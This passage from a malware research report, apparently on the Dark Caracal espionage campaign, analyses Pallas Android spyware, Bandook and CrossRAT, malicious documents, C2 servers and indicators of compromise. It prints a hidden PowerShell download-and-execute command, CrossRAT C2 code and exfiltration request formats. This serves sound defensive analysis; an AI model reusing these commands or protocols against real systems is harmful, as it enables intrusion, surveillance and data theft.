744Download an attacker-specified file to the target device and notify the C2. DWN1 ac=REPX
745uid=<Device_ID>
746RP=File Uploaded To Target : <file_name>
747Record an MPEG4 audio file (.mp4) for an attacker-specified duration.
748Audio is captured with the device’s microphone, and once complete is
749uploaded to the C2 server.
750REC1 ac=REPX
751uid=<Device_ID>
752RP=Microphone Already in use by another app
753Performs the same functionality as detailed above for the REC1 command with
754the exception that the file is stored locally on external storage under the path
755.Temp/srec
756SMS1 ac=REPX
757uid=<Device_ID>
758RP=Microphone Already in use by another app
759Send a text message to an attacker-specified number. SMS1 ac=REPX
760uid=<Device_ID>
761RP=SMS sent to<destinationAddress>
762Displays an alert with a phishing theme on a compromised device with the
763intention of stealing the victim’s credentials. Any entered credentials are sent
764to attacker servers.
765PWS1 ac=PPWS
766uid=<Device_ID>
767PS=<victim’s credentials>
768Checks the Android build on the device as well as the permissions of the app. PRM1
769If the installed Pallas sample is a trojanized version of Telegram, WhatsApp,
770Threema, or Primo, then retrieve their databases and, if present, associated keys.
771WT1
772Create a zip file of the shared_pref for the installed Pallas app and upload it to
773C2 infrastructure.
774SHPR ac=GTMBF
775TFX=<a string set by C2>
776Manipulate Bitmap images, convert to JPG, and upload to C2. SILF
777Same operation as SILF but on a directory of images. SIFO ac=GTMBF
778TFX=<a string set by C2>
779Split an attacker-specified file into chunks, saving them to
780external storage under the path .Temp/spd/.
781SPLT1 ac=REPX
782uid=<Device_ID>
783RP=<fileName> Splitted
784Create a zipfile of the contents of an attacker-specified directory and upload it
785to a C2 server.
786ZDIR1
787 27
788SECURITY RESEARCH REPORT
789Pallas handles the exfiltrated data server-side via the upload.php script. This accepts HTTP POST requests that have the following
790headers and structure, where op_id specifies the type of file being uploaded.
791When Pallas receives the GALL1 instruction, it uploads exfiltrated data as a zip archive or saves it as a .db file. For most .db files,
792each line is base64 encoded and prepended with the string “*#@â€. When decoded, each line translates to a piece of exfiltrated
793data. Each piece of information is associated with a content keyword or data type. This can be represented as follows:
794<DataType><separator>[<field><separator>...<field><separator>]
795POST
796Request properties
797Connection : Keep-Alive
798ENCTYPE : multipart/form-data
799Content-Type : multipart/form-data;boundary=*****
800Uploaded_file : <abs_path_file_on_victim_device>
801upload.php?test=<app_id>&op=<op_id>&rn=<>&extra=<>&extra2=<>[&FLS=
802<>&RLD=<>]
803--*****\r\n
804Content-Disposition: form-data; name=\â€uploaded_file\â€;filename=\<abs_path_file_on_victim>\\r\n
805\r\n
806<data_from_victim_to_upload>\r\n
807--*****--\r\n
808 28
809SECURITY RESEARCH REPORT
810Data Data Type Fields Description
811SMS A0X01 date
812address
813body
814id
815type
816All SMS fields are set according to
817the Android SMS content provider
818documentation14 in which the address
819is the address of the other party and
820the type may be any of the following
821values:
822• “0†: ALL
823• “1â€: INBOX
824• “2â€: SENT
825• “3â€:â€DRAFTâ€
826• “4â€:OUTBOX
827• “5â€:FAILED
828• “6â€: QUEUED
829Contacts A0X02 Display_name
830Data1
831Times_contacted
832Last_time_contacted
833All contacts fields are set according
834to the Android ContactsContract
835documentation15.
836Calls A0X03 Number
837Type
838Date
839Duration
840All contacts fields are set according to
841the Android documentation for phone
842calls16 in which type is a string with
843any of the following values:
844• â€INCOMINGâ€
845• â€OUTGOINGâ€
846• “MISSEDâ€
847• â€nullâ€
848Date is in the standard Java SQL DATE
849format17.
850Installed package A0X04 Application_label
851Package_name
852Version_name
853Version_code
854Specifies the list of installed packages
855on a victim’s device.
856Browsing History A0X05 Page_title
857Page_URL
858Specifies the web pages a victim
859has visited.
860Analysis of all known Pallas samples seen to date has resulted in the identification of the following 10 data types:
86114 https://developer.android.com/guide/topics/providers/content-provider-basics.html
86215 https://developer.android.com/reference/android/provider/ContactsContract.CommonDataKinds.Phone.html
86316 https://developer.android.com/reference/android/provider/CallLog.Calls.html
86417 https://docs.oracle.com/javase/7/docs/api/java/sql/Date.html
865 29
866SECURITY RESEARCH REPORT
867Data Data Type Fields Description
868Bookmarks A0X06 Bookmark_Title
869Bookmark_URL
870Specifies the web pages a victim has
871bookmarked.
872WiFi A0X07 SSID
873Capabilities
874Level
875Frequency
876BSSID
877All the fields are defined in Android
878scan result documentation18.
879Accounts A0X08 Name
880Type
881Name is the account name of a victim
882and type is the authenticator name of
883that account.
884Access Logs MIAMO App_name
885App_path
886String1
887Specifies a “.db†file that contains
888File and Directory access logs of
889a trojanized app. The “MIAMOâ€
890information line is always the first line
891in such files. App_path is always a
892path that a Pallas sample has access
893to, for example, the SDCard or the
894application’s data folder.
895String1 is either set to “NO†or an
896absolute path.
897Access Logs D Directory_path
898Directory_name
899Directories that the app has accessed.
900Only exists in a file with “MIAMO†as
901the first line.
902Access Logs F File_path
903File_name
904File_length
905LasModifiedTime
906Files that the app has accessed.
907Only exists in a file with “MIAMOâ€
908 as the first line.
909(continued from page 28)
91018 https://developer.android.com/reference/android/net/wifi/ScanResult.html
911 30
912SECURITY RESEARCH REPORT
913Title: Android Update
914Package Name: com.esn.wal
915SHA1: 835befd9376f90a12892876b482c1dcc39643a09
916MD5: d965c3736e530bfdbfde2cc6a264f2aa
917RequestID : 0 C2 Phone Added : +7820435193
918MobileTargetUID : 0 VoicePhone Added : +7820944266
919Version : 0 VoicePhone Added : +78235424312
920MobileTargetID : nana Logging : 0
921HeartBeatInterval : 120 C2 : 180.235.133.57
922TrojanID : nana Ports: 21, 53, 443, 4111
923TrojanUID : 03FDAF68 Included exploits - Exynos Abuse
924UserID : 1000 Installed Modules
925• SMS
926• Phone log collection
927• Call recording
928• Device tracking
929MaxInfections : 30
930RemovalAtDate : 0
931RemovalIfNoProxy : 0
932Previous Use of FinFisher Spyware
933In addition to the Pallas samples, we discovered a previously unreported FinFisher sample19 on the tweetsfb[.]com server.
934It is unclear whether this sample was a demo provided to this actor or if the actor came across it via other means.
935The date of package and compilation for this sample is 2014-03-27 17:26:14 UTC.
936Below is the extracted configuration and relevant details of this sample.
93719 https://en.wikipedia.org/wiki/FinFisher
938 31
939SECURITY RESEARCH REPORT
940Surveillanceware - Desktop Components
941The desktop malware component exists in a range of file types, including executables, zip archives, PDFs, and Microsoft’s
942composite document file format. No zero days or publicly known exploits were located in these files and, based on several of
943the documents, the primary attack vector is believed to be social engineering via spear-phishing. Analysis into Dark Caracal’s
944desktop tooling did result in the discovery of a new cross-platform Java RAT known as CrossRAT and confirmed that this actor
945is using new variants of the Bandook family.
946Bandook
947The Bandook RAT was originally identified during EFF’s Operation Manul research, however, this investigation surfaced new
948variants belonging to this family. Written in Delphi and targeting Windows operating systems, Bandook samples are packed at
949multiple stages in order to both evade detection and slow down the process of reverse engineering by security analysts. At the
950time of writing, 19 out of 63 antivirus engines on the malware repository VirusTotal flagged most Bandook samples as malicious.
951First stage samples of the version of Bandook used by Dark Caracal include what appears to be a drawing program and a
952trojanized version of the Psiphon circumvention software20. While the drawing application was not fully functional and did not
953provide a user interface when launched, the modified version of Psiphon contained the complete legitimate functionality of the
954original application.
955The first stage malware is signed with a valid SSL certificate issued by Certum CA for Ale Couperus (alecouperus@mail[.]com).
956We have identified several distinct samples signed with this certificate. This suggests that the actors behind these samples
957control the private key for this certificate and have the ability to sign arbitrary packages. It is unclear at this time whether the
958private key associated with this certificate has been stolen or if the attackers obtained it via legitimate sources.
959Upon initial execution, the first stage of Bandook decrypts several strings that are stored in the data section and base64
960encoded. Below is the plaintext of some of these strings, which we can see as Windows API calls.
96120 SHA256 hash: ed25b0c20b1c1b271a511a1266fe3967ab851aaa9f793bdf4f3d19de1dcf6532
962 32
963SECURITY RESEARCH REPORT
964The malware uses these API calls to decrypt Bandook’s second stage, an embedded resource. This resource is a randomly
965named eight-character string of uppercase letters and numbers. During our research, we only observed the numbers two and
966three being used and these were often positioned towards the end of the string. Following the decryption of the second stage,
967the iexplore.exe binary is started and immediately replaced with the loaded resource. This is a technique known as “process
968hollowing21â€.
969The second stage Bandook samples are occasionally packed with the following modified UPX packer “UPX Modified >> *$igBy
970Ahmed18â€. Not all second stages were packed indicating that the authors may be actively developing the malware. As expected,
971the core malicious functionality resides in the second stage, which attempts to implant itself in the system and contact command
972and control infrastructure for further instructions. At this point, the malware has the ability to start new processes, manipulate the
973file system and registry, take screen captures, escalate privileges, create mutexes, get system information, execute commands,
974get window names, and beacon to infrastructure.
97521 https://attack.mitre.org/wiki/Technique/T1093
976Figure 25: Decoded strings from the Bandook sample
977 33
978SECURITY RESEARCH REPORT
979Bandook communication with attacker infrastructure takes place over a TCP port with HTTP payloads Base64 encoded and
980suffixed with the string “&&&â€. The following is an example of a decoded communication from an infected system:
981Instructions sent from Dark Caracal infrastructure to Bandook compromised systems make use of “~!†as a delimiter, the
982same approach used by the Pallas Android malware. This suggests there is a possibility Bandook and Pallas were written by
983the same author or that the author of one was inspired by the authors of the other. We found Bandook supports the following
984set of commands.
985From this, we can infer some additional functionality, including the ability to view the victim’s webcam, record sound, get Wi-Fi
986connections, manipulate USB devices, manipulate the Chrome browser, sign the victim out of Skype, search for files, upload new
987files to the device, execute secondary infections, or participate in a DDOS attack.
988Systems infected with this Bandook variant contain a copy of the first stage in the path C:\Users\user\AppData\
989Roaming\%appname%\%appname%.exe. Similarly, in such cases, autostart registry keys are written with the same name as the
990dropped file to HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run.
991@0000~!18128~!192.168.1.82~!610930~!EFFuser~!Seven~!0d 0h
9923m~!0~!4.1~!21/04/2017~!0~!0~!0~!0~!~!0~!0--~!None~!0~!
993CaptureScreen DeleteFileFromDevice DeleteAutoFTPFromDB
994Init CopyMTP ExecuteTV
995ClearCred ChromeInject ExecuteAMMY
996GetCamlist DisableChrome DDOSON
997SendCam RarFolder ExecuteTVNew
998StopCam SendUSBList getkey
999Uninstall SignoutSkype SendMTPList
1000CompressArchive StealUSB SendMTPList2
1001GenerateReports StartFileMonitor GrabFileFromDevice
1002GetWifi SendFileMonLog PutFileOnDevice
1003StartShell GetUSBMONLIST StopFileMonitor
1004GetSound GetFileMONLIST SendinfoList
1005SplitMyFile StopUSBMonitor EnableAndLoadCapList
1006GetAutoFTP SearchMain DisableMouseCapture
1007SendStartup StopSearch AddAutoFTPToDB
1008 34
1009SECURITY RESEARCH REPORT
1010CrossRAT
1011While investigating the axroot[.]com domain, we discovered a new remote access trojan called CrossRAT that we believe was
1012developed by, or for, Dark Caracal. Written in Java with the ability to target Windows, Linux, and OSX, CrossRAT is able to
1013manipulate the file system, take screenshots, run arbitrary DLLs for secondary infection on Windows, and gain persistence on
1014the infected system.
1015When executed in a Windows environment, CrossRAT attempts to copy itself to %AppData%\Local\ Temp\mediamgrs.jar before,
1016like Bandook, creating an auto-start registry key in HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run with the
1017name “mediamgrsâ€.
1018On OSX and Linux, it attempts to write a copy of itself to /usr/var/mediamgrs.jar. If CrossRAT does not have sufficient permissions
1019to write to this directory, it will fail back to the following path under the user’s home directory: $HOME/Library/mediamgrs.jar.
1020For CrossRAT installations on OSX, a Launch Agent is created under $HOME/Library/ LaunchAgents/mediamgrs.plist to ensure
1021that it will be launched again when the computer restarts. When on Linux, this persistence is achieved by writing an autorun file
1022to $HOME/.config/autostart/mediamgrs.desktop.
1023CrossRAT performs communications to its C2 infrastructure via a TCP socket. The following is an example of content sent over
1024the wire from a compromised machine:
1025CrossRAT uses a similar structure to Pallas and Bandook when communicating with infrastructure. Specifically, it uses &&& to
1026terminate the response string and uses @### to start command strings.
1027Below is a code snippet from a CrossRAT sample. The response prefixes, hard coded C2 server of flexberry[.]com, and fixed
1028port of 2223, are clearly visible.
10295287249f-caa2-4b66-850c-49eedd46cf47$#@@0000$#@192.168.1.16$#@Windows
10307$#@6.1$#@EFFuser^585948$#@0.1$#@GROUP2$#@&&&
1031public final class k
1032{
1033 public static boolean a = false;
1034 // Hardcoded C2 Information
1035 public static String b = “flexberry.comâ€; // C2 Server
1036 public static int c = 2223; // C2 Port
1037 35
1038SECURITY RESEARCH REPORT
1039 public static String d = “$#@â€; // Argument delimiter
1040 public static String e = “^!@â€; // delimiter within arguments
1041 public static UUID f;
1042 public static String g;
1043 public static Preferences h;
1044 public static String i = “0.1â€; // Version Number
1045 public static String j = “GROUP2â€; // Campaign name
1046 public static Socket k;
1047 public static Socket l;
1048 // Server command prefixes
1049 public static String m = “@0000â€; // Enumerate root directories on the system. 0 args
1050 public static String n = “@0001â€; // Enumerate files on the system. 1 arg
1051 public static String o = “@0002â€; // Create blank file on system. 1 arg
1052 public static String p = “@0003â€; // Copy File. 2 args
1053 public static String q = “@0004â€; // Move file. 2 args
1054 public static String r = “@0005â€; // Write file contents. 4 args
1055 public static String s = “@0006â€; // Read file contents. 4 args
1056 public static String t = “@0007â€; // Heartbeat request. 0 args
1057 public static String u = “@0008â€; // Get screenshot. 0 args
1058 public static String v = “@0009â€; // Run a DLL (windows only). 1 arg
1059 // Client response prefixes
1060 public static String w = “@0000â€; // client hello
1061 public static String x = “@0001â€; // heartbeat response
1062 public static String y = “@0002â€; // List of system root directories
1063 public static String z = “@0003â€; // Status message for file manager connect, unimplemented
1064 public static String A = “@0004â€; // Status message for file manager connect, unimplemented
1065 public static String B = “@0005â€; // List of files on system
1066 public static String C = “@0006â€; // End list of files on system
1067 public static String D = “@0007â€; // file created status message
1068 public static String E = “@0008â€; // file written status message
1069 public static String F = “@0009â€; // file moved status message
1070 public static String G = “@0010â€; // file write status
1071 public static String H = “@0011â€; // file read status and file contents
1072 public static String I = “@0012â€; // send screenshot contents
1073 public static String J = “@0013â€; // Run DLL status message
1074 public static String K; // Filepath for CrossRAT
1075(continued from page 34)
1076Analysis of CrossRAT shows that it has a version number of 0.1, which indicates that its malicious capabilities are still under
1077development. Implemented functionality includes the ability to enumerate attacker-specified directories, copy / move / read
1078files, beacon to C2 infrastructure, run attacker specific libraries (Windows only), and create empty files. The CrossRAT sample
1079we discovered was last modified in March of 2017.
1080 36
1081SECURITY RESEARCH REPORT
1082var v = app.viewerVers, ion;
1083if (v < 7) {
1084 var n = 0;
1085 if (this.dataObjects != null) n = this.dataObjects.length;
1086 if (v >= 5 && v < 6 && n > 0 && (app.viewerVariation == “Full†|| app.viewerVariation ==
1087“Fill-Inâ€)) {
1088 if (this.external\) app.alert(“This document has file attachments. To view the
1089attachments, click the Save button to save a copy of the document, open the copy in Acrobat,
1090and use the File > Document Properties > Embedded Data Objects menu.â€, 3, 0);
1091 else app.\alert(“This document has file attachments. Use the File > Document Properties
1092> Embedded Data Objects menu to view the attachments.â€, 3, 0);
1093 } else if (v >= 6 && v < 7) {
1094 if (n == 0) {
1095 var np = this.numPages;
1096 syncAnnotScan();\
1097 for (var p = 0; p < np && n == 0; ++p) {
1098 var annots = this.getAnnots(p);
1099 if (annots != null) {
1100 for (var i = 0; i < annots.length; ++i) {
1101 if (annots[i].type == “FileAttachmentâ€) {
1102 n = 1;\
1103 break;
1104 }
1105 }
1106 }
1107 }
1108 }
1109 if (n > 0) {
1110 if (this.external) app.alert(“This document has file attachments. To view the
1111attachments, click the black triangle at the top of the document window’s vertical scrollbar
1112and \
1113choose File Attachments.â€, 3, 0);
1114 else app.alert(“This document has file attachments. Use the Document > File
1115Attachments menu to view the attachments.â€, 3, 0);
1116 }
1117 }
1118}
1119---
1120this.exportDataObject({ cName: “BL920123.docâ€, nLaunch: 2 });
1121Infected Documents
1122We identified several Word documents which appear to be intended for use as infection vectors in phishing attacks.
1123None of the documents appear to contain any exploits, but rather rely on macros to run malicious code on a target
1124system. If executed in an environment that has macros enabled, the malware downloads its second stage components.
1125We saw this same process in numerous malicious PDF files that used javascript to download secondary stages. The
1126following script is an example of this functionality, which is identical to the malicious Word doc with the SHA256 hash
1127e5eeb0a46dac58b171ebcefec60e9ff351fc7279d95892c6f48f799a1a364215 (Word macro fixed.doc).
1128 37
1129SECURITY RESEARCH REPORT
1130Other Samples
1131Surprisingly, we also observed a malicious Microsoft Compiled HTML Help file with the .chm extension. Primarily used for
1132software documentation, .chm files were first introduced with the release of Window 98. However, they are still supported in
1133Windows 7. The chm file attempts to execute a command via Powershell that downloads an additional file called ne.abc from
1134the server cma-cgrm[.]com. Below is the command contained in the malicious .chm file.
1135At the time of analysis, this server was no longer live and, as such, the associated ne.abc binary has not yet been acquired and
1136does not appear on VirusTotal. The cma-cgrm[.]com domain is not obviously connected with other infrastructure.
1137Figure 26: An observed malicious Word file that, when executed, attempts to run macros in order to download
1138and execute Bandook stage one
1139cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile
1140-WindowStyle Hidden (New-Object
1141System.Net.WebClient).DownloadFile(‘https://cmacgrm[.]com/ebusiness/ne.abc’,’%TEMP%\chmplg.exe’);Start-Process
1142
1143%TEMP%\chmplg.exe;
1144 38
1145SECURITY RESEARCH REPORT
1146Infrastructure
1147While analyzing adobeair[.]net, we uncovered sprawling infrastructure used by Dark Caracal. This infrastructure serves a broad
1148set of purposes, including acting as storage for exfiltrated data, masquerading as an Android App Store hosting malware,
1149delivering attacker commands to infected devices, and providing phishing content aimed at gathering credentials for various
1150well known services.
1151We found much of this infrastructure hosted on servers provided by Shinjiru, an offshore bulletproof hosting provider that allows
1152its customers to host almost any content. WHOIS information listed for the adobeair[.]net C2 server led to the discovery of many
1153of these domains, as did scanning of Shinjiru IP blocks for servers running a set of services. This acted as a fingerprint for Dark
1154Caracal’s infrastructure. To date, the following domains and IPs have been identified as connected to the infrastructure used
1155by Dark Caracal.
1156Domain Links / Connection to Dark Caracal
1157adobeair[.]net Shared C2 server / Exfiltrated data server
1158secureandroid[.]info Blackmarket “Android App Storeâ€
1159tweetsfb[.]com Watering hole, Facebook groups, used to phish credentials, running Apache Win32
1160fbarticles[.]com Phishing domain linked by WHOIS (op13)
1161Arablivenews[.]com [EXPIRED] WHOIS (op13)
1162Nancyrazzouk[.]com [EXPIRED] WHOIS (nancyrazzouk)
1163Arabpublisherslb[.]com WHOIS (nancyrazzouk)
1164flexberry[.]com 94[.]229[.]70[.]7 (Windows)
1165planethdx[.]com 94[.]229[.]70[.]7 (Windows)
1166globalmic[.]net 94[.]229[.]70[.]7 (Windows)
1167megadeb[.]com 94[.]229[.]70[.]7 (Windows)
1168opwalls[.]com 94[.]229[.]70[.]7 (Windows)
1169mecodata[.]com 94[.]229[.]70[.]7 (Windows)
1170sabisint[.]com 94[.]229[.]70[.]7 (Windows)
1171roxsoft[.]net 94[.]229[.]70[.]7 (Windows)
1172axroot[.]com Windows malware campaign
1173skypeupdate[.]com Windows malware campaign
1174playermea[.]com Windows malware campaign
1175kaliex[.]net Windows malware campaign
1176tenoclock[.]net Windows malware campaign
1177ancmax[.]com Windows malware campaign
1178 39
1179SECURITY RESEARCH REPORT
1180The following relevant contact information has also been identified during this investigation.
1181Primary Command and Control Server
1182As noted, adobeair[.]net is hosted on Shinjiru. This bulletproof hosting company allows its customers to host almost any type of
1183content, protects client identity, accepts Bitcoin for payment, and is more resilient than other providers to takedowns22. Shinjiru
1184has also been used to host many of the Dark Caracal Windows domains dating back over seven years to April 27th, 2010
1185(see a list of Windows malware domains in the Windows infrastructure section below).
1186At the time of writing, adobeair[.]net is currently live and running a fairly unique set of services. We have used this server as a
1187fingerprint in the discovery of further related infrastructure. These services include XAMPP for Windows 5.6.31, Apache 2.4.26,
1188MariaDB 10.1.25, PHP 5.6.31, phpMyAdmin 4.7.0, and OpenSSL 1.0.2. We confirmed these via an nmap scan of the adobeair server.23
1189Email Link/Context
1190op13@mail[.]com Primary email contact for C2 server. Associated with “rami jabbour†“Hadi Maz
1191nancyrazzouk@mail[.]com nancyrazzouk
1192hicham.dika@mail[.]com SSL cert in exe
1193hetemramadani5@gmail.com SSL cert in exe
1194alecouperus@mail.com SSL cert in exe
119522 https://www.shinjiru.com/company/about-us/
119623 https://www.apachefriends.org/download.html
1197Figure 27: Nmap scan of adobeair[.]net
1198 40
1199SECURITY RESEARCH REPORT
1200The adobeair[.]net C2 server had the Apache mod_status module enabled. This provides operators with information on server
1201activity, performance, and a statistics page under /server-status that details connected clients and the server resources they are
1202accessing. By programmatically monitoring this page, we were able to determine the source IPs of infected clients and admins
1203logging into the console.
1204The adobeair[.]net server has, as of late September 2017, been moved to a new hosting provider, M247, and the operators have
1205improved the security.
1206WHOIS history for adobeair[.]net lists Nancy Razzouk with an email address of op13@mail[.]com as the registrant. We have identified
1207the “Nancy Razzouk†persona as the SSL signer of the Windows malware samples and the registrant of multiple domains. Its reuse
1208has helped identify further Dark Caracal infrastructure.
1209Figure 28: WHOIS information for adodeair[.]net as observed in August 2017
1210 41
1211SECURITY RESEARCH REPORT
1212Watering Hole Server
1213During this investigation, we determined this server is the only infrastructure we discovered that serves up malicious apps
1214belonging to the Pallas malware family. A detailed analysis of these applications can be found under the Android Surveillanceware
1215section. As with other Dark Caracal infrastructure, the secureandroid[.]info domain was also registered with the bulletproof hosting
1216company Shinjiru.
1217We found links to these landing pages in the exfiltrated content of compromised devices, which indicates it is actively being used
1218during the attack chain. As of December 2017 it appears that secureandroid[.]info has had its domain expire.
1219Phishing Domains
1220We identified the Dark Caracal domain tweetsfb[.]com while analyzing the secureandroid[.]info server source code. We identified
1221two bit[.]ly URLs on this server that resolve to other pages on the tweetsfb site that were carefully crafted to look like the Facebook
1222and Twitter login portals. The copyright dates suggest these pages are clones of the originals from 2015.
1223Figure 29: Screenshot of the secureandroid[.]info watering hole server, a
1224distribution point for Pallas
1225Figure 30: Dark Caracal clones of Twitter and Facebook login portals
1226 42
1227SECURITY RESEARCH REPORT
1228These bit[.]ly links and their respective resolving links are:
1229• http://bit[.]ly/2j3r285 points to
1230http://www.tweetsfb[.]com/services/100001472583690/twitter/articles/100001/
1231• http://bit[.]ly/2iByHcu points to
1232http://tweetsfb[.]com/services/100001472583690/facebook/groups/100002/
1233The tweetsfb[.]com domain was found to share an IP address (172.94.17.147) with the following additional domains.
1234We were able to find additional phishing campaigns in VirusTotal that referenced fbarticles[.]com. While fbarticles was registered
1235by the op13@mail[.]com address with the name “Hadi Mazeh,†the WHOIS information for fbtweets was private.
1236Figure 31: Domains sharing the same IP address as tweetsfb[.]com
1237Figure 32: Detections in VirusTotal for fbarticles[.]com
1238 43
1239SECURITY RESEARCH REPORT
1240Note: we identified three further domains — “facebookservices[.]orgâ€, “gmailservices[.]orgâ€, and “twiterservices[.]org†that were
1241once a part of this campaign. Those domains now appear to be sinkholed.
1242When we discovered these domains, the threat actors had already taken them offline and another individual had purchased
1243them. This individual is associated with unrelated domains that are connected to other APT reports. However, we noticed that
1244the individual purchased the domains after the APT reports went public. While we’re not sure why this individual is purchasing,
1245sinkholing, and monitoring these domains, we think it’s an interesting note.
1246Figure 33: Detections in VirusTotal for the IP address that hosted fbarticles[.]com
1247 44
1248SECURITY RESEARCH REPORT
1249Windows C2 Servers
1250The Windows server infrastructure has a much longer history than the Android infrastructure, showing that the actors are willing
1251to evolve to new technologies, such as mobile, as they become more valuable targets.
1252The Windows malware servers hosted control panels for multiple campaigns using various malware that included IRIS
1253RAT, Bandook, and Arcom RAT. We found these servers hosting exfiltrated desktop content, Windows malware signed by
1254“alecouperus@mail[.]comâ€, and the CrossRAT trojan.
1255All of these domains share the same IP on more than one occasion and have migrated between hosting providers in the same
1256time window. Most of these domains were hosted on Shinjiru, the same hosting server for the Android campaign.
1257The following screenshot shows HTTP 200 OK response codes for http://<server>/<Payload>/
1258Each of the following directories contained a login panel for either IRIS RAT or Arcom RAT.
1259ancmax[.]com
1260planethdx[.]com
1261mecodata[.]com
1262globalmic[.]net
1263kaliex[.]net
1264axroot[.]com
1265sabisint[.]com
1266megadeb[.]com
1267roxsoft[.]net
1268flexberry[.]com
1269opwalls[.]com
1270Figure 34: Various RAT login portals found on a mix of the C2 servers
1271 45
1272SECURITY RESEARCH REPORT
1273Using the Wayback Machine we identified the signature Win32 apache server running on skypeupdate[.]com in 2016. This server
1274was first seen resolving to an IP belonging to Shinjiru in late 2013 and last seen resolving to a Shinjiru IP in late 2016.
1275The oldest domain we identified as part of this infrastructure is flexberry[.]com. The following screenshot shows passive DNS
1276resolution dating back to 2010.
1277Figure 35: Passive DNS resolutions for the infrastructure
1278 46
1279SECURITY RESEARCH REPORT
1280Appendix
1281Indicators of Compromise and Actor Tracking
1282IOC
1283Email
1284op13@mail[.]com
1285hicham.dika@mail[.]com
1286nancyrazzouk@mail[.]com
1287alecouperus@mail[.]com
1288hetemramadani5@gmail.com
1289info@secureandroid[.]info
1290IP
1291111.90.141[.]70
1292111.90.145[.]64
1293111.90.141[.]38
1294111.90.158.121
1295111.90.141.169
1296111.90.145.64
1297111.90.150.221
1298180.235.133.57
1299172.111.250.156
130077.78.103.41
130174.208.167[.]252
1302111.90.140[.]11
1303111.90.150[.]221
1304Phone Number
1305+7820435193
1306+7820944266
1307+7820944266
1308Domain
1309adobeair[.]net
1310tweetsfb[.]com
1311secureandroid[.]info
1312fbtweets[.]net
1313gsec[.]in
1314arabpublisherslb[.]com
1315sabisint[.]com
1316fbarticles[.]com
1317planethdx[.]com
1318opwalls[.]com
1319kaliex[.]net
1320axroot[.]com
1321megadeb[.]com
1322mecodata[.]com
1323roxsoft[.]net
1324flexberry[.]com
1325globalmic[.]net
1326playermea[.]com
1327 47
1328SECURITY RESEARCH REPORT
1329(continued from page 46)
1330arablivenews[.]com
1331ecowatchasia[.]com
1332etn9[.]com
1333ancmax[.]com
1334tenoclock[.]net
1335kaliex[.]net
1336mangoco[.]net
1337jaysonj.no-ip[.]biz
1338orange2015[.]net
1339skypeservice.no-ip[.]org
1340accountslogin[.]services
1341adobeinstall[.]com
1342adobe-flashviewer.accountslogin[.]services
1343dropboxonline[.]com
1344iceteapeach[.]com
1345nvidiaupdate[.]com
1346skypeupdate[.]com
1347paktest.ddns[.]net
1348watermelon2017[.]com
1349IOC Type PackageName
1350b0151434815f8b3796ab83848bf6969a2b2ad721 SHA1 com.primo.mobile.android.app
1351bfbe5218a1b4f8c55eadf2583a2655a49bf6a884 SHA1 org.thoughtcrime.securesms
135247243997992d253f7c4ea20f846191697999cd57 SHA1 com.psiphon3
1353ed4754effda466b8babf87bcba2717760f112455 SHA1 com.gbwhatsapp
1354309038fceb9a5eb6af83bd9c3ed28bf4487dc27d SHA1 org.telegram.plus
1355eaed6ce848e68d5ec42837640eb21d3bfd9ae692 SHA1 org.torproject.android
1356edf037efc400ccb9f843500103a208fe1f254453 SHA1 org.telegram.plus
135735b70d89af691ac244a547842b7c8dfd9a7233fe SHA1 ch.threema.app
13587d47da505f8d3ee153629b373f6792c8858f76e8 SHA1 com.flashplayer.player
13594896b0c957b6a985b2b6efe2ffe517dceaa6ce01 SHA1 com.flashplayer.player
13606a2d5c0a4cc5b5053f5c8f15c447316fae66b57b SHA1 com.flashplayer.player
1361Mobile Implant Apps
1362 48
1363SECURITY RESEARCH REPORT
1364Desktop Implant Apps
1365SHA2 Sum File Type
1366ce583821191345274cd954b2db7da9742c239fe413fc17dcb97ffdd7b51cb072 MS Windows HtmlHelp Data
1367ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2 PE32 executable (DLL) (GUI) Intel 80386
136826419a0b6e033cdcb7bf4ca6b0b24fda35490cc6f2796682fb9403620f63d428 PE32 executable (GUI) Intel 80386
136915af5bbf3c8d5e5db41fd7c3d722e8b247b40f2da747d5c334f7fd80b715a649 Zip archive data
137022eee43887e94997f9f9786092ffd3a9b51f059924cba678cf7b62cfafa65b28 PE32 executable (GUI) Intel 80386
1371fcf8f9566868d65d901fd6db9a8d6decacb860f5595f84a6a878193eda11549d PDF document, version 1.6
1372f2178146741f91923c7d3e2442bd08605ed5a0927736e8cfdea00c055b2c6284 PDF document, version 1.6
13736b6d363d653785f420dcc1a23c9d9b8b76b8647209b52562b774c793dc0e3f6b data
1374a3ae05a134b30b8c8869d0acd65ed5bca160988b404c146a325f2399b9c1a243 PE32 executable (DLL) (GUI) Intel 80386
1375e5eeb0a46dac58b171ebcefec60e9ff351fc7279d95892c6f48f799a1a364215 Composite Document File V2 Document
1376400bca713ba1def9cdbc0e84fc97447db2fa3d12b1c5ef352ef985b7787b6ca4 Microsoft Word 2007+
13775e0d061531071e53b3b993e06ce20dae6389a7e9eba5d7887399de48e2f2d278 Composite Document File V2
1378f9f2e632535b214a0fab376b32cbee1cab6507490c22ba9e12cfa417ed8d72bb MS-DOS executable
1379bf600e7b27bdd9e396e5c396aba7f079c244bfb92ee45c721c2294aa36586206 PE32 executable (GUI)
1380da81aec00b563123d2fbd14fb6a76619c90f81e83c5bd8aa0676922cae96b9ad PE32 executable (GUI) Intel 80386
13819cf3d3c0b790cebeacb8cb577cd346a6513b1b74fa120aff8984aa022301562e PE32 executable (DLL) (GUI) Intel 80386
1382091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b PE32 executable (GUI) Intel 80386
1383a91c2cad20935a85d6eed72ef663254396914811f043018732d29276424a9578 PE32 executable (GUI) Intel 80386
1384b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d PE32 executable (GUI) Intel 80386
1385ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790 PE32 executable (GUI) Intel 80386
13865c1622cabf21672a8a5379ce8d0ee0ba6d5bc137657f3779faa694fcc4bb3988 PE32 executable (GUI) Intel 80386
138786f1bbda3ebf03a0f0a79d7bd1db68598ace9465f5cebb7f66773f8a818b4e8b PE32 executable (DLL) (GUI) Intel 80386
1388675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd PE32 executable (DLL) (GUI) Intel 80386
1389ed25b0c20b1c1b271a511a1266fe3967ab851aaa9f793bdf4f3d19de1dcf6532 PE32 executable (GUI) Intel 80386
